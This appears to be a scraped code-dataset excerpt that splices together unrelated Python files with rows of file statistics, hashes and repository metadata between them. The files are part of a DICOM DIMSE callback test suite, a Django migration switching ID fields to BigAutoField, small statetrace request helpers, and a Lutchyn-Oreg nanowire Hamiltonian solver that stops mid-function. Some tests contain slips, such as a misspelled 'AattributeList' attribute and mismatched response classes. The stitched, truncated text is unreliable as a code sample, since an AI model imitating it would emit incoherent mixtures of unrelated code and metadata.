primitive.AffectedSOPInstanceUID = '1.1.1.1'
primitive.AttributeList = BytesIO(b'\x00\x01')
self.dimse.send_msg(primitive, 1)
def test_callback_send_n_action(self):
"""Check callback for sending DIMSE N-ACTION messages."""
# N-ACTION-RQ
primitive = N_ACTION()
primitive.MessageID = 1
primitive.RequestedSOPClassUID = '1.1.1'
primitive.RequestedSOPInstanceUID = '1.1.1.2'
primitive.ActionTypeID = 5
self.dimse.send_msg(primitive, 1)
# User defined
primitive.ActionInformation = BytesIO(b'\x00\x01')
self.dimse.send_msg(primitive, 1)
# N-ACTION-RSP
primitive = N_ACTION()
primitive.MessageIDBeingRespondedTo = 1
primitive.Status = 0x0000
self.dimse.send_msg(primitive, 1)
# User defined
primitive.ActionTypeID = 5
primitive.AffectedSOPClassUID = '1.2'
primitive.AffectedSOPInstanceUID = '1.2.3'
primitive.ActionReply = BytesIO(b'\x00\x01')
self.dimse.send_msg(primitive, 1)
def test_callback_send_n_create(self):
"""Check callback for sending DIMSE N-CREATE messages."""
# N-CREATE-RQ
primitive = N_CREATE()
primitive.MessageID = 1
primitive.AffectedSOPClassUID = '1.1.1'
self.dimse.send_msg(primitive, 1)
# User defined
primitive.AffectedSOPInstanceUID = '1.2.3'
primitive.AttributeList = BytesIO(b'\x00\x01')
self.dimse.send_msg(primitive, 1)
# N-CREATE-RSP
primitive = N_CREATE()
primitive.MessageIDBeingRespondedTo = 1
primitive.Status = 0x0000
self.dimse.send_msg(primitive, 1)
primitive.AffectedSOPClassUID = '1.2'
primitive.AffectedSOPInstanceUID = '1.2.3'
primitive.AattributeList = BytesIO(b'\x00\x01')
self.dimse.send_msg(primitive, 1)
def test_callback_send_n_delete(self):
"""Check callback for sending DIMSE N-DELETE messages."""
# N-DELETE-RQ
primitive = N_DELETE()
primitive.MessageID = 1
primitive.RequestedSOPClassUID = '1.1.1'
primitive.RequestedSOPInstanceUID = '1.2.3'
self.dimse.send_msg(primitive, 1)
# N-DELETE-RSP
# No affected SOP class/instance
primitive = N_DELETE()
primitive.MessageIDBeingRespondedTo = 1
primitive.Status = 0x0000
self.dimse.send_msg(primitive, 1)
# Affected SOP Class
primitive.AffectedSOPClassUID = '1.1.2'
self.dimse.send_msg(primitive, 1)
# Affected SOP Instance
primitive.AffectedSOPInstanceUID = '1.1.3'
self.dimse.send_msg(primitive, 1)
# Receive
def test_callback_receive_c_echo(self):
"""Check callback for receiving DIMSE C-ECHO messages."""
# C-ECHO-RQ
primitive = C_ECHO()
primitive.MessageID = 7
primitive.Priority = 0x02
msg = C_ECHO_RQ()
msg.primitive_to_message(primitive)
msg.ID = 1
self.dimse.debug_receive_c_echo_rq(msg)
# C-ECHO-RSP
primitive = C_ECHO()
primitive.MessageIDBeingRespondedTo = 4
primitive.Status = 0x0000
msg = C_ECHO_RSP()
msg.primitive_to_message(primitive)
self.dimse.debug_receive_c_echo_rsp(msg)
def test_callback_receive_c_store(self):
"""Check callback for sending DIMSE C-STORE messages."""
# C-STORE-RQ
primitive = C_STORE()
primitive.MessageID = 7
primitive.AffectedSOPClassUID = '1.2.840.10008.5.1.4.1.1.2'
primitive.AffectedSOPInstanceUID = '1.2.392.200036.9116.2.6.1.48.' \
'1215709044.1459316254.522441'
primitive.Priority = 0x02
primitive.MoveOriginatorApplicationEntityTitle = 'UNITTEST_SCP'
primitive.MoveOriginatorMessageID = 3
primitive.DataSet = BytesIO()
# No dataset
msg = C_STORE_RQ()
msg.primitive_to_message(primitive)
self.dimse.debug_receive_c_store_rq(msg)
# Dataset
ref_ds = Dataset()
ref_ds.PatientID = 'Test1101'
ref_ds.PatientName = "Tube HeNe"
primitive.DataSet = BytesIO(encode(ref_ds, True, True))
msg = C_STORE_RQ()
msg.primitive_to_message(primitive)
# Dataset
self.dimse.debug_receive_c_store_rq(msg)
# C-STORE-RSP
primitive = C_STORE()
primitive.MessageIDBeingRespondedTo = 7
primitive.AffectedSOPClassUID = '1.2.840.10008.5.1.4.1.1.2'
primitive.AffectedSOPInstanceUID = '1.2.392.200036.9116.2.6.1.48.' \
'1215709044.1459316254.522441'
primitive.MoveOriginatorApplicationEntityTitle = 'UNITTEST_SCP'
primitive.MoveOriginatorMessageID = 3
primitive.DataSet = BytesIO()
# Check statuses + no dataset
for status in [0x0000, 0xb000, 0xb007, 0xb006, 0xa700, 0xa900, 0xc000]:
primitive.Status = status
msg = C_STORE_RSP()
msg.primitive_to_message(primitive)
self.dimse.debug_receive_c_store_rsp(msg)
# Dataset
ref_ds = Dataset()
ref_ds.PatientID = 'Test1101'
ref_ds.PatientName = "Tube HeNe"
msg = C_STORE_RSP()
msg.primitive_to_message(primitive)
# Dataset
msg.data_set = BytesIO(encode(ref_ds, True, True))
self.dimse.debug_receive_c_store_rsp(msg)
def test_callback_receive_c_find(self):
"""Check callback for receiving DIMSE C-FIND messages."""
# C-FIND-RQ
primitive = C_FIND()
primitive.MessageID = 7
primitive.AffectedSOPClassUID = '1.2.840.10008.5.1.4.1.1.2'
primitive.AffectedSOPInstanceUID = '1.2.392.200036.9116.2.6.1.48.' \
'1215709044.1459316254.522441'
primitive.Priority = 0x02
primitive.MoveOriginatorApplicationEntityTitle = 'UNITTEST_SCP'
primitive.MoveOriginatorMessageID = 3
primitive.Identifier = BytesIO()
# No dataset
msg = C_FIND_RQ()
msg.primitive_to_message(primitive)
self.dimse.debug_receive_c_find_rq(msg)
# Dataset
ref_ds = Dataset()
ref_ds.PatientID = 'Test1101'
ref_ds.PatientName = "Tube HeNe"
primitive.Identifier = BytesIO(encode(ref_ds, True, True))
msg = C_FIND_RQ()
msg.primitive_to_message(primitive)
# Dataset
self.dimse.debug_receive_c_find_rq(msg)
# C-FIND-RSP
primitive = C_FIND()
primitive.MessageIDBeingRespondedTo = 7
primitive.AffectedSOPClassUID = '1.2.840.10008.5.1.4.1.1.2'
primitive.AffectedSOPInstanceUID = '1.2.392.200036.9116.2.6.1.48.' \
'1215709044.1459316254.522441'
primitive.MoveOriginatorApplicationEntityTitle = 'UNITTEST_SCP'
primitive.MoveOriginatorMessageID = 3
primitive.Identifier = BytesIO()
# No dataset
primitive.Status = 0x0000 # Must be for pending
msg = C_FIND_RSP()
msg.primitive_to_message(primitive)
self.dimse.debug_receive_c_find_rsp(msg)
primitive.Identifier = BytesIO(encode(ref_ds, True, True))
msg = C_FIND_RSP()
msg.primitive_to_message(primitive)
# Dataset
msg.data_set = BytesIO(encode(ref_ds, True, True))
self.dimse.debug_receive_c_find_rsp(msg)
# Non-pending status
msg.data_set.Status = 0x0001
self.dimse.debug_receive_c_find_rsp(msg)
# C-CANCEL-FIND-RQ
self.dimse.debug_receive_c_cancel_rq(msg)
def test_callback_receive_c_get(self):
"""Check callback for receiving DIMSE C-GET messages."""
# C-GET-RQ
primitive = C_GET()
primitive.MessageID = 7
primitive.AffectedSOPClassUID = '1.2.840.10008.5.1.4.1.1.2'
primitive.AffectedSOPInstanceUID = '1.2.392.200036.9116.2.6.1.48.' \
'1215709044.1459316254.522441'
primitive.Priority = 0x02
primitive.MoveOriginatorApplicationEntityTitle = 'UNITTEST_SCP'
primitive.MoveOriginatorMessageID = 3
primitive.Identifier = BytesIO()
# No dataset
msg = C_GET_RQ()
msg.primitive_to_message(primitive)
self.dimse.debug_receive_c_get_rq(msg)
# Dataset
ref_ds = Dataset()
ref_ds.PatientID = 'Test1101'
ref_ds.PatientName = "Tube HeNe"
primitive.Identifier = BytesIO(encode(ref_ds, True, True))
msg = C_GET_RQ()
msg.primitive_to_message(primitive)
# Dataset
self.dimse.debug_receive_c_get_rq(msg)
# C-GET-RSP
primitive = C_GET()
primitive.MessageIDBeingRespondedTo = 7
primitive.AffectedSOPClassUID = '1.2.840.10008.5.1.4.1.1.2'
primitive.AffectedSOPInstanceUID = '1.2.392.200036.9116.2.6.1.48.' \
'1215709044.1459316254.522441'
primitive.MoveOriginatorApplicationEntityTitle = 'UNITTEST_SCP'
primitive.MoveOriginatorMessageID = 3
primitive.Identifier = BytesIO()
primitive.NumberOfCompletedSuboperations = 1
primitive.NumberOfWarningSuboperations = 3
primitive.NumberOfFailedSuboperations = 4
# No dataset, remaining subops
primitive.Status = 0x0000 # Must be for pending
msg = C_GET_RSP()
msg.primitive_to_message(primitive)
self.dimse.debug_receive_c_get_rsp(msg)
# Dataset
ref_ds = Dataset()
ref_ds.PatientID = 'Test1101'
ref_ds.PatientName = "Tube HeNe"
primitive.Identifier = BytesIO(encode(ref_ds, True, True))
primitive.NumberOfRemainingSuboperations = 2
msg = C_GET_RSP()
msg.primitive_to_message(primitive)
# Dataset
self.dimse.debug_receive_c_get_rsp(msg)
# C-CANCEL-GET-RQ
self.dimse.debug_receive_c_cancel_rq(msg)
def test_callback_receive_c_move(self):
"""Check callback for receiving DIMSE C-MOVE messages."""
# C-MOVE-RQ
msg = C_MOVE_RQ()
self.dimse.debug_receive_c_move_rq(msg)
# C-MOVE-RSP
primitive = C_MOVE()
primitive.MessageIDBeingRespondedTo = 7
primitive.AffectedSOPClassUID = '1.2.840.10008.5.1.4.1.1.2'
primitive.AffectedSOPInstanceUID = '1.2.392.200036.9116.2.6.1.48.' \
'1215709044.1459316254.522441'
primitive.MoveOriginatorApplicationEntityTitle = 'UNITTEST_SCP'
primitive.MoveOriginatorMessageID = 3
primitive.Identifier = BytesIO()
primitive.NumberOfCompletedSuboperations = 1
primitive.NumberOfWarningSuboperations = 3
primitive.NumberOfFailedSuboperations = 4
# No dataset, remaining subops
primitive.Status = 0x0000 # Must be for pending
msg = C_MOVE_RSP()
msg.primitive_to_message(primitive)
self.dimse.debug_receive_c_move_rsp(msg)
# Dataset
ref_ds = Dataset()
ref_ds.PatientID = 'Test1101'
ref_ds.PatientName = "Tube HeNe"
primitive.Identifier = BytesIO(encode(ref_ds, True, True))
primitive.NumberOfRemainingSuboperations = 2
msg = C_GET_RSP()
msg.primitive_to_message(primitive)
# Dataset
self.dimse.debug_receive_c_move_rsp(msg)
# C-CANCEL-MOVE-RQ
self.dimse.debug_receive_c_cancel_rq(msg)
def test_callback_receive_n_event_report(self):
"""Check callback for receiving DIMSE N-EVENT-REPORT messages."""
# N-EVENT-REPORT-RQ
primitive = N_EVENT_REPORT()
primitive.MessageID = 1
primitive.AffectedSOPClassUID = '1.1.1'
primitive.AffectedSOPInstanceUID = '1.1.1.1'
primitive.EventTypeID = 5
msg = N_EVENT_REPORT_RQ()
msg.primitive_to_message(primitive)
msg.ID = 1
self.dimse.debug_receive_n_event_report_rq(msg)
# User defined
primitive.EventInformation = BytesIO(n_er_rq_ds)
msg = N_EVENT_REPORT_RQ()
msg.primitive_to_message(primitive)
msg.ID = 1
self.dimse.debug_receive_n_event_report_rq(msg)
# N-EVENT-REPORT-RSP
primitive = N_EVENT_REPORT()
primitive.MessageIDBeingRespondedTo = 1
primitive.Status = 5
msg = N_EVENT_REPORT_RSP()
msg.primitive_to_message(primitive)
msg.ID = 1
self.dimse.debug_receive_n_event_report_rsp(msg)
# User defined
primitive.AffectedSOPClassUID = '1.2.3'
primitive.AffectedSOPInstanceUID = '1.2.3.4'
primitive.EventTypeID = 4
primitive.EventReply = BytesIO(n_er_rsp_ds)
msg = N_EVENT_REPORT_RSP()
msg.primitive_to_message(primitive)
msg.ID = 1
self.dimse.debug_receive_n_event_report_rsp(msg)
def test_callback_receive_n_get(self):
"""Check callback for receiving DIMSE N-GET messages."""
# N-GET-RQ
primitive = N_GET()
primitive.MessageID = 1
primitive.RequestedSOPClassUID = '1.1.1'
primitive.RequestedSOPInstanceUID = '1.1.1.1'
msg = N_GET_RQ()
msg.primitive_to_message(primitive)
msg.ID = 1
self.dimse.debug_receive_n_get_rq(msg)
# Plus user defined
primitive.AttributeIdentifierList = [(0x0000, 0x0000), (0xffff, 0xffff)]
msg = N_GET_RQ()
msg.primitive_to_message(primitive)
msg.ID = 1
self.dimse.debug_receive_n_get_rq(msg)
# N-GET-RSP
# Mandatory elements
primitive = N_GET()
primitive.MessageIDBeingRespondedTo = 1
primitive.Status = 0x0000
msg = N_GET_RSP()
msg.primitive_to_message(primitive)
msg.ID = 1
self.dimse.debug_receive_n_get_rsp(msg)
# User defined
primitive.AffectedSOPClassUID = '1.1.1'
primitive.AffectedSOPInstanceUID = '1.1.1.1'
msg = N_GET_RSP()
msg.primitive_to_message(primitive)
msg.ID = 1
self.dimse.debug_receive_n_get_rsp(msg)
# Conditional
primitive.AttributeList = BytesIO(n_get_rsp_ds)
msg = N_GET_RSP()
msg.primitive_to_message(primitive)
msg.ID = 1
self.dimse.debug_receive_n_get_rsp(msg)
def test_callback_receive_n_set(self):
"""Check callback for receiving DIMSE N-SET messages."""
# N-SET-RQ
primitive = N_SET()
primitive.MessageID = 1
primitive.RequestedSOPClassUID = '1.1.1'
primitive.RequestedSOPInstanceUID = '1.1.1.1'
primitive.ModificationList = BytesIO(n_set_rq_ds)
msg = N_SET_RQ()
msg.primitive_to_message(primitive)
msg.ID = 1
self.dimse.debug_receive_n_set_rq(msg)
# N-SET-RSP
primitive = N_SET()
primitive.MessageIDBeingRespondedTo = 1
primitive.Status = 0x0000
msg = N_SET_RSP()
msg.primitive_to_message(primitive)
msg.ID = 1
self.dimse.debug_receive_n_set_rsp(msg)
# User defined
primitive.AffectedSOPClassUID = '1.1.1'
primitive.AffectedSOPInstanceUID = '1.1.1.1'
primitive.ModificationList = BytesIO(n_set_rsp_ds)
msg = N_GET_RSP()
msg.primitive_to_message(primitive)
msg.ID = 1
self.dimse.debug_receive_n_set_rsp(msg)
def test_callback_receive_n_action(self):
"""Check callback for receiving DIMSE N-ACTION messages."""
# N-ACTION-RQ
primitive = N_ACTION()
primitive.MessageID = 1
primitive.RequestedSOPClassUID = '1.1.1'
primitive.RequestedSOPInstanceUID = '1.1.1.1'
primitive.ActionTypeID = 2
msg = N_ACTION_RQ()
msg.primitive_to_message(primitive)
msg.ID = 1
self.dimse.debug_receive_n_action_rq(msg)
# User defined
primitive.ActionInformation = BytesIO(n_action_rq_ds)
msg = N_ACTION_RQ()
msg.primitive_to_message(primitive)
msg.ID = 1
self.dimse.debug_receive_n_action_rq(msg)
# N-ACTION-RSP
primitive = N_ACTION()
primitive.MessageIDBeingRespondedTo = 1
primitive.Status = 0x0000
msg = N_ACTION_RSP()
msg.primitive_to_message(primitive)
msg.ID = 1
self.dimse.debug_receive_n_action_rsp(msg)
# User defined
primitive.AffectedSOPClassUID = '1.1.1'
primitive.AffectedSOPInstanceUID = '1.1.1.1'
primitive.ActionTypeID = 2
primitive.ActionReply = BytesIO(n_action_rsp_ds)
msg = N_ACTION_RSP()
msg.primitive_to_message(primitive)
msg.ID = 1
self.dimse.debug_receive_n_action_rsp(msg)
def test_callback_receive_n_create(self):
"""Check callback for receiving DIMSE N-CREATE messages."""
# N-CREATE-RQ
primitive = N_CREATE()
primitive.MessageID = 1
primitive.AffectedSOPClassUID = '1.1.1'
msg = N_CREATE_RQ()
msg.primitive_to_message(primitive)
msg.ID = 1
self.dimse.debug_receive_n_create_rq(msg)
# User defined
primitive.AffectedSOPInstanceUID = '1.1.1.1'
primitive.AttributeList = BytesIO(n_create_rq_ds)
msg = N_CREATE_RQ()
msg.primitive_to_message(primitive)
msg.ID = 1
self.dimse.debug_receive_n_create_rq(msg)
# N-CREATE-RSP
primitive = N_CREATE()
primitive.MessageIDBeingRespondedTo = 1
primitive.Status = 0x0000
msg = N_CREATE_RSP()
msg.primitive_to_message(primitive)
msg.ID = 1
self.dimse.debug_receive_n_create_rsp(msg)
# User defined
primitive.AffectedSOPClassUID = '1.1.1'
primitive.AffectedSOPInstanceUID = '1.1.1.1'
primitive.AttributeList = BytesIO(n_create_rsp_ds)
msg = N_CREATE_RSP()
msg.primitive_to_message(primitive)
msg.ID = 1
self.dimse.debug_receive_n_create_rsp(msg)
def test_callback_receive_n_delete(self):
"""Check callback for receiving DIMSE N-DELETE messages."""
# N-DELETE-RQ
primitive = N_DELETE()
primitive.MessageID = 1
primitive.RequestedSOPClassUID = '1.1.1'
primitive.RequestedSOPInstanceUID = '1.1.1.1'
msg = N_DELETE_RQ()
msg.primitive_to_message(primitive)
msg.ID = 1
self.dimse.debug_receive_n_delete_rq(msg)
# N-DELETE-RSP
primitive = N_DELETE()
primitive.MessageIDBeingRespondedTo = 1
primitive.Status = 0x0000
msg = N_DELETE_RSP()
msg.primitive_to_message(primitive)
msg.ID = 1
self.dimse.debug_receive_n_delete_rsp(msg)
# User optional
primitive.AffectedSOPClassUID = '1.2.3'
msg = N_DELETE_RSP()
msg.primitive_to_message(primitive)
msg.ID = 1
self.dimse.debug_receive_n_delete_rsp(msg)
primitive.AffectedSOPInstanceUID = '1.2.3.4'
msg = N_DELETE_RSP()
msg.primitive_to_message(primitive)
msg.ID = 1
self.dimse.debug_receive_n_delete_rsp(msg)
| 33.817486 | 80 | 0.633067 | 3,683 | 30,943 | 5.086614 | 0.056476 | 0.01153 | 0.008808 | 0.050443 | 0.893349 | 0.861909 | 0.823956 | 0.761557 | 0.702359 | 0.663179 | 0 | 0.045839 | 0.269592 | 30,943 | 914 | 81 | 33.854486 | 0.783063 | 0.115794 | 0 | 0.794165 | 0 | 0 | 0.053573 | 0.023103 | 0 | 0 | 0.009478 | 0.001094 | 0.004862 | 1 | 0.071313 | false | 0.02269 | 0.016207 | 0.003241 | 0.094003 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
1ca54001ed5a057efd202a00e5e74dce2903f796 | 2,772 | py | Python | tests/core/migrations/0009_auto_20211111_0807.py | marksweb/django-import-export | 26977ed44ff8f2c9769b14bc69f0b41f3524da6d | [
"BSD-2-Clause"
] | 2,020 | 2015-05-20T02:41:40.000Z | 2022-03-31T14:37:50.000Z | tests/core/migrations/0009_auto_20211111_0807.py | marksweb/django-import-export | 26977ed44ff8f2c9769b14bc69f0b41f3524da6d | [
"BSD-2-Clause"
] | 1,195 | 2015-05-19T15:28:11.000Z | 2022-03-31T16:56:16.000Z | tests/core/migrations/0009_auto_20211111_0807.py | marksweb/django-import-export | 26977ed44ff8f2c9769b14bc69f0b41f3524da6d | [
"BSD-2-Clause"
] | 680 | 2015-05-27T16:54:17.000Z | 2022-03-31T07:56:09.000Z | # Generated by Django 3.2.9 on 2021-11-11 08:07
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('core', '0008_auto_20190409_0846'),
]
operations = [
migrations.AlterField(
model_name='author',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='book',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='category',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='child',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='entry',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='parent',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='person',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='profile',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='role',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='withdefault',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='withdynamicdefault',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='withfloatfield',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
]
| 37.459459 | 111 | 0.598846 | 281 | 2,772 | 5.725979 | 0.177936 | 0.089497 | 0.186451 | 0.216283 | 0.832194 | 0.832194 | 0.832194 | 0.832194 | 0.832194 | 0.832194 | 0 | 0.015516 | 0.279221 | 2,772 | 73 | 112 | 37.972603 | 0.78979 | 0.016234 | 0 | 0.716418 | 1 | 0 | 0.062018 | 0.00844 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.014925 | 0 | 0.059701 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
1cd87593b35686f688bbe671ba490c6d4792f6b4 | 238 | py | Python | polls/statetrace.py | SoCal-Software-Labs/statetrace-example-django | 59985af6f88cd5f35c80a5d911943723da20b4b9 | [
"MIT"
] | null | null | null | polls/statetrace.py | SoCal-Software-Labs/statetrace-example-django | 59985af6f88cd5f35c80a5d911943723da20b4b9 | [
"MIT"
] | null | null | null | polls/statetrace.py | SoCal-Software-Labs/statetrace-example-django | 59985af6f88cd5f35c80a5d911943723da20b4b9 | [
"MIT"
] | null | null | null | def action_meta(request):
return {"my custom action meta": {"arbitary json": 123}}
def session_meta(request):
return {"my custom session meta": {"some json": 456}}
def filter_func(request):
return request.method in ["POST"] | 26.444444 | 60 | 0.689076 | 33 | 238 | 4.878788 | 0.545455 | 0.242236 | 0.21118 | 0.236025 | 0.310559 | 0 | 0 | 0 | 0 | 0 | 0 | 0.030303 | 0.168067 | 238 | 9 | 61 | 26.444444 | 0.782828 | 0 | 0 | 0 | 0 | 0 | 0.288703 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | false | 0 | 0 | 0.5 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
e81c436269fa160d42c689927d4427bb780373d2 | 80,080 | py | Python | MajoranaNanowires/H_class/Lutchyn_Oreg/solvers.py | Samdaz/MajoranaNanowires | d411b918ac0638fc3bf0441ced6e1e2ba7f3b4fb | [
"MIT"
] | 2 | 2020-08-10T07:06:15.000Z | 2022-02-22T10:46:30.000Z | MajoranaNanowires/H_class/Lutchyn_Oreg/solvers.py | Samdaz/MajoranaNanowires | d411b918ac0638fc3bf0441ced6e1e2ba7f3b4fb | [
"MIT"
] | null | null | null | MajoranaNanowires/H_class/Lutchyn_Oreg/solvers.py | Samdaz/MajoranaNanowires | d411b918ac0638fc3bf0441ced6e1e2ba7f3b4fb | [
"MIT"
] | 2 | 2021-09-29T02:54:36.000Z | 2022-03-29T22:52:46.000Z |
'''
###############################################################################
"MajoranaNanowire" Python3 Module
v 1.0 (2020)
Created by Samuel D. Escribano (2018)
###############################################################################
"H_class/Lutchyn_Oreg/builders" submodule
This sub-package solves Lutchyn-Oreg Hamiltonians.
###############################################################################
'''
#%%############################################################################
######################## Required Packages ############################
###############################################################################
import numpy as np
import scipy.sparse
import scipy.sparse.linalg
import scipy.linalg
import scipy.constants as cons
from MajoranaNanowires.Functions import order_eig, diagonal
from MajoranaNanowires.Functions import H_rec2shape, U_shape2rec
#%%
def LO_1D_solver(H,N,dis,
mu=0,B=0,aR=0,d=0,
space='position',k_vec=0,
sparse='no',n_eig=None,near=None):
"""
1D Lutchy-Oreg Hamiltonian solver. It solves the Hamiltoninan (built with
Lutchyn_builder) of a 1D Lutchy-Oreg chain with superconductivity.
Parameters
----------
H: arr
Discretized 1D Lutchyn-Oreg Hamiltonian built with Lutchyn_builder.
N: int
Number of sites.
dis: int
Distance (in nm) between sites.
mu: float or arr
On-site chemical potential. If it is float, the chemical potential
is the same in every site, while if it is a 1D array, it is the
on-site chemical potential.
B: float or arr
Zeeman splitting.
-If B is a float, the same constant B is added in the x direction
in each site and in every diagonalization step.
-If B is a 1D array of length=3, each element of the array is the
(constant) Zeeman splitting in each direction, which is added in
every diagonalization step.
aR: float or arr
Rashba coupling.
-If aR is a float, the same constant aR is added in the z direction
in each site and in every diagonalization step.
-If aR is a 1D array of length=3, each element of the array is the
(constant) Rashba coupling in each direction, which is added in
every diagonalization step.
-If aR is a 2D array (3 x (N)), each element of the array aR[i] is
the Rashba coupling in each direction, whose matrix alements are
the on-site Rashba couplings.
d: float or arr
On-site superconductivity. If it is float, the SC pairing amplitude
is the same in every site, while if it is a 1D array, it is the
on-site superconductivity.
space: {"position","momentum","position2momentum"}
Space in which the Hamiltonian is built. "position" means
real-space (r-space). In this case the boundary conditions are open.
On the other hand, "momentum" means reciprocal space (k-space). In
this case the built Hamiltonian corresponds to the Hamiltonian of
the unit cell, with periodic boundary conditions along the
x-direction. "position2momentum" means that the Hamiltonian is
built in real space, but you want to diagonalize it in momentum
space (so in each step is converted to a momentum space).This
option is recommended for large matrices.
k_vec: arr
If space=='momentum' or "position2momentum", k_vec is the
(discretized) momentum vector, usually in the First Brillouin Zone.
sparse: {"yes","no"}
Sparsety of the built Hamiltonian. "yes" builds a dok_sparse matrix,
while "no" builds a dense matrix.
n_eig: int
If sparse=="yes", n_eig is the number of eigenvalues you want to
obtain. If BdG=='yes', these eigenvalues are obtained around zero
energy, whil if BdG=='no' these eigenvalues correspond to the
lowest-energy eigenstates. This can be changed with the near option.
near: float
If sparse=="yes" and BdG=='no', near provides the value around to
which the eigenvalues must be found.
section: {"rectangular","hexagonal"}
Whether the system have a rectangular or hexagonal cross-section
in the plane zy.
Rashba={"Full-Rashba","kx-terms"}
Whether include all the terms of the Rashba coupling (Full-Rashba)
or include only those terms proportional to kx (kx-terms).
Returns
-------
E: arr (n_eig x n)
Eigevalues (energies), ordered from smaller to larger.
U: arr ((2 x N) x n_eig x n)
Eigenvectors of the system with the same ordering.
"""
#Make sure that some parameters are arrays:
if np.isscalar(mu) and not(mu==0):
mu = mu * np.ones(N)
if np.isscalar(B) and not(B==0):
Bx=B
By=0
Bz=0
Bx,By,Bz=Bx*np.ones(N),By*np.ones(N),Bz*np.ones(N)
elif np.ndim(B)==1:
Bx=B[0]
By=B[1]
Bz=B[2]
Bx,By,Bz=Bx*np.ones(N),By*np.ones(N),Bz*np.ones(N)
if np.ndim(aR)==0:
aRy=np.zeros(N)
aRz=aR*np.ones(N)/(2*dis)
elif np.ndim(aR)==1:
if len(aR)==3:
aRy=aR[1]*np.ones(N)/(2*dis)
aRz=aR[2]*np.ones(N)/(2*dis)
else:
aRy=np.zeros(N)
aRz=aR/(2*dis)
else:
aRy=aR[1]/(2*dis)
aRz=aR[2]/(2*dis)
if np.isscalar(d):
d = d * np.ones(N)
if space=='position' or space=='position2momentum':
n_k=len(k_vec)
#Store matrices:
if n_eig==None:
n_eig=4*N
if space=='position':
E = np.empty([int(n_eig)])
U = np.empty([4*N,int(n_eig)],dtype=complex)
elif space=='momentum' or space=='position2momentum':
E = np.empty([int(n_eig),n_k])
U = np.empty([4*N,int(n_eig),n_k],dtype=complex)
if sparse=='no':
H_add=np.zeros((4*N,4*N),dtype=complex)
else:
if not(scipy.sparse.issparse(H)):
H = scipy.sparse.dok_matrix(H)
H_add=scipy.sparse.dok_matrix((4*N,4*N),dtype=complex)
#Obtain the add-values Hamiltonian:
if not(np.isscalar(mu)):
e=-mu
for i in range(2):
H_add[diagonal(2*N*(i+1),init=2*N*i)] = (-1)**i*(np.repeat(e,2))
if not(np.isscalar(B) and B==0):
Bz = np.repeat(Bz,2)
Bz[1::2] = -Bz[::2]
for i in range(2):
H_add[diagonal(2*N*(i+1),init=2*N*i,k=1,step=2)], H_add[diagonal(2*N*(i+1),init=2*N*i,k=-1,step=2)] = (-1)**(i)*Bx-1j*By, (-1)**(i)*Bx+1j*By
H_add[diagonal(2*N*(i+1),init=2*N*i)] += (-1)**i*Bz
if not((aRy==0).all() and (aRz==0).all()):
aRy = np.repeat(aRy,2)
aRy[1::2] = -aRy[::2]
for i in range(2):
H_add[diagonal(2*N*(i+1),init=2*N*i,k=-2)]= +1j*aRy[2::]
H_add[diagonal(2*N*(i+1),init=2*N*i,k=2)] = -1j*aRy[2::]
H_add[diagonal(2*N*(i+1),k=1,step=2,init=1+2*N*i)] += -1*(-1)**i*aRz[1::]
H_add[diagonal(2*N*(i+1),k=-1,step=2,init=1+2*N*i)] += -1*(-1)**i*aRz[1::]
H_add[diagonal(2*N*(i+1),init=2*N*i,k=3,step=2)] += (-1)**i*aRz[1::]
H_add[diagonal(2*N*(i+1),init=2*N*i,k=-3,step=2)] += (-1)**i*aRz[1::]
if not(np.isscalar(d)):
d=d.flatten()
H_add[diagonal(4*N,k=2*N+1,step=2)], H_add[diagonal(4*N,k=-2*N-1,step=2)] = -np.conj(d), -d
H_add[diagonal(4*N,k=2*N-1,step=2,init=1)], H_add[diagonal(4*N,k=-2*N+1,step=2,init=1)] = np.conj(d), d
#Diagonalize the Hamiltonian:
if sparse=='no':
if space=='position':
E[0:2 * N], U[0:4 * N, 0:2 * N] = scipy.linalg.eigh(H+H_add, lower=False,eigvals=(2*N,4*N-1))
E[2*N:4*N]=-E[0:2*N]
